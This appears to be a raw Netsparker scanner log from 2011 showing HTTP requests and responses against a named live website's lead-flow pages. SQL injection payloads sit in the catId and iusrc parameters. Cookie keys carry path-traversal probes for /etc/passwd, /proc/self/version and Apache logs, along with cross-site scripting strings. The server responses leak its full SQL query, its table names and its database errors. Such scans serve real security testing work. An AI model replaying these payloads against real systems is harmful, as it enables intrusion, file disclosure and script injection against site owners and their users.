OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:26:03 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=j836bi4plnuj9pbmbo7iu0clq5; path=/
Content-Length: 4143
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/obtm00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/obtm00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?catId='+ (select 
convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/obtm00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/obtm00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/obtm00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/'You have an error in your SQL syntax; check the manual that corresponds to 
your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 5
- /ppc/leadflow/parl00/project.php

/ppc/leadflow/parl00/project.php

http://www.insideup.com/ppc/leadflow/parl00/project.php?catId='%2B%20(select+convert(int,CHAR(95)%2B..

Parameters

Parameter Type Value
catId GET '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
iusrc GET iupsc

Request

GET /ppc/leadflow/parl00/project.php?catId='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&iusrc=iupsc HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:27:09 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=6hr2g3rud7uupus7m31485c9g3; path=/
Content-Length: 4143
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/parl00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/parl00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?catId='+ (select 
convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/parl00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/parl00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/parl00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/'You have an error in your SQL syntax; check the manual that corresponds to 
your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 5
- /ppc/leadflow/bulo00/project.php

/ppc/leadflow/bulo00/project.php

http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc='%2B%20(select+convert(int..

Parameters

Parameter Type Value
catId GET 30005
iusrc GET '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'

Request

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B' HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:27:19 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=n5hg8lkmiscark5lpoeuadar45; path=/
Content-Length: 4143
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc='+ (select 
convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc='+ (select 